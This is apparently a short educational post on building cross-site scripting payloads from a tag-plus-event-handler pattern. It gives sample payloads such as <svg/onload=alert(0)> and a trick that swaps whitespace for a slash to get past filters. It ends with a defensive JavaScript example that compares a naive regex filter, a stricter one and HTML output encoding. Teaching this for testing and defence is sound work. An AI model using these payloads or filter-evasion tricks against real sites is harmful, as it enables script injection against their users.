We often reuse a handful of common payloads when testing a web app for XSS, but there is a technique you can use to build your own XSS payloads. Different payloads can be built from this general pattern:
<htmltag event-handler=javascript-code-to-be-executed>
For example:
<b onmouseover='alert(0)'>
where <b> is an HTML tag,
onmouseover is an event handler,
and alert(0) is the JavaScript to be executed.
Remember that when creating your own payloads, whitespace can be replaced with /. For example,
<svg onload=alert(0)> can be written as
<svg/onload=alert(0)>
Some payloads need user interaction:
<svg onclick='alert(0)'>
Some payloads need something before them:
<frameset><frame src onload='alert(0)'>
More advanced XSS payloads can be generated using WebGun, an XSS payload generator designed by Brute Logic.
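From the defender's side, the / separator shown above is why an input filter that expects whitespace before an event handler is unreliable. The following is an added example, not code from the original post: it runs the post's payloads through a whitespace-only check, a check that also accepts /, and HTML output encoding, which is the fix that does not depend on pattern matching. The function names are illustrative assumptions.

```javascript
// Added example, not from the original post. The samples are the payloads
// quoted in the post plus one benign string (constructed).
const SAMPLES = [
  "<b onmouseover='alert(0)'>",
  "<svg onload=alert(0)>",
  "<svg/onload=alert(0)>",
  "<svg onclick='alert(0)'>",
  "<frameset><frame src onload='alert(0)'>",
  "<b>plain bold text</b>",
];

// Naive filter: assumes an event handler is always preceded by whitespace.
function naiveHasHandler(input) {
  return /<[a-z][^>]*\son[a-z]+\s*=/i.test(input);
}

// Stricter check: HTML parsers also accept "/" as an attribute separator.
function hasHandler(input) {
  return /<[a-z][^>]*[\s\/]on[a-z]+\s*=/i.test(input);
}

// Output encoding: the browser receives text, never a tag, so the
// tag/event-handler pattern cannot form regardless of how it is spelled.
function escapeHtml(input) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return input.replace(/[&<>"']/g, (c) => map[c]);
}

// Build one row per sample so the three approaches can be compared.
function report(samples) {
  return samples.map((s) => ({
    input: s,
    naive: naiveHasHandler(s),
    strict: hasHandler(s),
    encoded: escapeHtml(s),
  }));
}

console.table(report(SAMPLES));
```

The naive check misses the <svg/onload=alert(0)> form; pattern checks like these are useful for logging and alerting, while encoding on output is what actually prevents execution.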
#Hack2learn